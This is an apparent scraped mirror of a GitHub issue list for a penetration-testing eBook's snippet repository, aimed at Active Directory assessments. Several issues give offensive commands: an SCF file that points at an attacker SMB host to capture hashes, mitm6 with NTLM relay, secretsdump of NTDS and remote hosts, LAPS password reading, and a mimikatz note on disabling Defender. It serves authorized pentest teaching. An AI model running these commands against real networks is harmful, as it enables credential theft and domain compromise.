7minsec / ebook Goto Github PK

View Code? Open in Web Editor NEW

0.0 0.0 0.0 3 KB

A place to track code snippets (as well as future enhancements and typo fixes!) in 7MinSec's Light Pentest LITE eBook

ebook's People

Contributors

Watchers

ebook's Issues

Better parsing for vulnerable EternalBlue hosts

I think would be something like this:

grep -B 9 VULNERABLE: st-vuln2-eblue.nmap | grep -i "nmap scan report for" | awk '{print $5}'

Add command to parse a bloodhound json export

When you need to export a big list of systems (such as those you have admin access over) from BloodHound, you get a big .json file with a bunch of extra data in it. It can help to use some cat action to slim that down:

cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' | sort

And to remove @domain.com:

cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' | awk -F’@’ ‘{print $1}’ | sort

Add PowerUpSQL attack

Take all the context here and bake it in: https://7ms.us/7ms-567-how-to-build-an-intentionally-vulnerable-sql-server/

Add information on remediating Kerberoasting

This looks awesome, test in lab:

https://github.com/MahdiTehrani/Get-SPNReport/blob/d6cf62aade7d681e10d828db0697226cbafb3d40/Get-SPNReport.ps1

Add LNK/SCF attack

Teach folks how to use one of these files like:

[Shell]
Command=2
IconFile=\\your.attacking.box.ip\icon.ico
[Taskbar]
Command=ToggleDesktop

If you can't browse directly to the shares you want to drop .scf files at, use Kali built-in smbclient tool to do the job:

smbclient \\\\the.ip.of.server\\sharename -U samplecompany/billybob

Add more CrackMapExec context

Incorporate everything from:

Add additional secretsdump context

Offline dump:

Secretsdump -ntds Active Directory\ntds.dit -system registry/SYSTEM -hashes lmhash:nthash LOCAL -outputfile loot/bigdump

Secretsdump from a local machine:

python3 secretsdump.py test.local/john:[email protected]

Add man-in-the-middle-6 (mitm6) attack

Spin up a loot share

smbserver.py share2 /share -smb2support

Kick things off with mitm6

sudo python3 /opt/mitm6/mitm6/mitm6.py -i eth0 -d pwn.town --no-ra --ignore-nofqdn

Get the relay going:

sudo python3 /opt/impacket/examples/ntlmrelayx.py -6 -wh doesntexist -t ldaps://10.0.7.100 -smb2support --delegate-access

Add tip to change "pwn3d" text within cme

In the cme.conf file you can change from Pwn3d to something else

Add this repo link to eBook content

Maybe stick it in the footer so it's easily visible?

Tackle ADCS (Active Directory Certificate Services)

Find vulns with Certify, certipy, certi.

And maybe talk about tools to find/remediate these vulns, like the SpecterOps stuff and https://github.com/TrimarcJake/Locksmith

(tied to 7MinSec/LPLITE#24)

Add getst example and secretsdump context

Getst.py -spn cifs/somedc.domain.com domain.com/user -dc-ip ip.of.some.dc

^^^ this might not work?

getTGT.py 'contoso.local/Anakin:Vader1234!'
Export KRB5CCNAME=user.ccache
Secretsdump -debug -k FQDN.OF.SOMEBOX

But this does?

Secretsdump domain.com/user@somebox

Use this repo to host code snippets

Some folks have reported the PDF is a bit hard to copy and paste from. Would be helpful to host some code snippets directly from here.

Add section on PowerHuntShares

This is awesome: https://github.com/NetSPI/PowerHuntShares

Write about it in the book. kthxbye.

Add Domain Password Audit Tool (DPAT) instructions

These DPAT resources are awesome:

This bit of code helped me parse out all the groups:

Get-AdGroup -Filter * | % { Get-AdGroupMember $_.Name | Select-Object -ExpandProperty SamAccountName | Out-File -FilePath "$($_.Name).txt" -Encoding ASCII }

Work in some mimikatz tips and tricks

Pull in some mimikatz tips like you do in LPLITE lab. (i.e. PS remote session, turn off Defender, make a dump file). Maybe mention the many ways to do mimikatz'ing:

https://redteamrecipe.com/64-Methods-For-Execute-Mimikatz/

Script to batch resolve hostnames to IPs

It's good!

$filePath = "hosts.txt"
$exportPath = "output.csv"
$hostnames = Get-Content $filePath

$table = @()

foreach ($hostname in $hostnames) {
    try {
        $ipAddress = [System.Net.Dns]::GetHostAddresses($hostname) | Select-Object -ExpandProperty IPAddressToString
        $table += [PSCustomObject]@{
            Hostname = $hostname
            IPAddress = $ipAddress
        }
    }
    catch {
        $table += [PSCustomObject]@{
            Hostname = $hostname
            IPAddress = 'N/A'
        }
    }
}

# Sort the table by IP address
$table = $table | Sort-Object IPAddress

# Export the sorted table to CSV
$table | Export-Csv -Path $exportPath -NoTypeInformation

Better Get-ADUser code to parse fields and find sensitive information

A nice nugget from a reader:

Get-ADUser -filter {enabled -eq $true} -Properties * | ForEach-Object{$_.psobject.properties| Where-Object {($_.Name -notmatch "MemberOf|PropertyNames") -and ($_.Value -like "*passw*")}}|Select-Object baseobject,name,value|sort-object baseobject | export-csv users.csv

Need to test this in the lab first.

Find ILO/IPMI cards

This snippet helps:

cat st-all.gnmap | grep -i "623/open" | awk '/open/{print $3}' | tr -d '()' | sort > 623-maybe-open.txt

Add some LAPS enumeration/abuse

Query to find all LAPS passwords:

Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -Properties 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' | select dnshostname,ms-mcs-admpwd

Also talk about the Get-LAPSPasswords thing (https://www.netspi.com/blog/technical/network-penetration-testing/running-laps-around-cleartext-passwords/)
And this (git clone https://github.com/n00py/LAPSDumper.git)

Create markdown for all scripts in the eBook

Yeah that's a good idea.

7minsec / ebook Goto Github PK

ebook's People

Contributors

Watchers

ebook's Issues

Recommend Projects

Recommend Topics

Recommend Org